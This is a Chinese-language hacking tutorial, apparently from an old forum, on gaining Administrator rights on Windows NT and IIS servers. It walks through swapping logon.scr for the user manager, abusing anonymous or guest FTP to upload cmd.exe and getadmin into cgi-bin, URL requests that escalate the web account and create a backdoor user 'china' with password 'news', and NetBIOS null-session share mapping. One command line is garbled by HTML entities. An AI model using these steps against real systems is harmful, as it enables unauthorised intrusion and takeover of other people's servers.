即便是Administrastor账户也不安全

如果你有普通用户帐号，有个一个很简单的方法获取NT Administrator帐号:

之一: 先把c:/winnt/system32下的logon.scr改名为logon.old备份，然后把usrmgr.exe改名为logon.scr，然后重新启动。

logon.scr是启动时加载的程序，重新启动后，不会出现以往的登陆密码输入界面，而是用户管理器。

这时他就有权限把自己加到Administrator组，不要忘记把文件名改回来啊!

之二:

下面的技术适用于不重视NT网络安全的网站, 一些 http的技术也可以供较高级的人员参考。进入NT网络可以采取下面的步骤:

因为nt的iis server的ftp一般都是允许anonymous匿名帐号进入的，有些anonymous的帐号还有upload权限，我们就要攻击这类站点。因为如果不允许匿名帐号，就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。

正因为允许匿名帐号ftp登陆的设定，也给我们带来了突破nt server的机会。我们用ftp登陆一个nt server,比如:www.xxx.com(示例名):

ftp www.xxx.com connected to www.xxx.com

ntsvr2这个东西暴露了其netbios名，那么在iis的背景下，必然会有一个iuser_ntsvr2的用户帐号，属于domain user组，这个帐号我们以后要用来获取administrator的权限。

user (www.xxx.comnone)):anonymous password: 输入 guest@ 或者guest

对于缺乏网络安全知识的管理员来说，很多人没有将guest帐号禁止，或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号，虽然只属于domain guest组。

在这种情况下我们就可以进nt server的ftp了。

进去以后,看看目录列表，试试 cd /c 或wwwroot等关键目录，如果运气好,改变目录成功，这时你就有了80%的把握。

现在，开始查找cgi-bin目录(或者scripts目录)。进去以后，把winnt下的cmd.execopy到cgi-bin，把getadmin和gasys.dll传上去到cgi-bin。

然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?iusr_saturn

大约十多秒后屏幕显示:

cgi error

这时有90%的可能是：你已经把iuser_ntsvr2升级为administrator，也就是任何访问该web站的人都是管理员。

下面可以add user:

http://www.xxx.com/cgi-bin/cmd.exe?/c c:/winnt/system32/net.exe user china news /add

这样就创建了一个叫china用户，密码是news，然后：

http://www.xxx.com/cgi-bin/getadmin.exe?china

或者

http://www.xxx.com/scripts/tools/getadmin.exe?china

你再用china的帐号登陆，就可以有最大的权限了，也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe，也可以自己传一个上去到scripts/tools或者cgi-bin目录。

之三：

用nt的netbios技术扫描

nbtstat -a http://www.xxx.com/

或者，

nbtstat -a http://www.xxx.com/

这样可以得到其域的共享资源名称；

net view file:/www.xxx.com/

可以获得其机器的共享资源名称，如果有c盘，

net use f: file:/www.xxx.com/c

可以用f：映射其c盘，

net use $">//111.111.111.111/ipc$content$nbsp;"quot;"quot; /user:"quot;"quot;

之四: unix下移植过来的工具：

windows95和98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包：windump95.exe 使用前还要下载这个库 packet95.exe。

windowsnt用户的版本，windump.exe packetnt.exe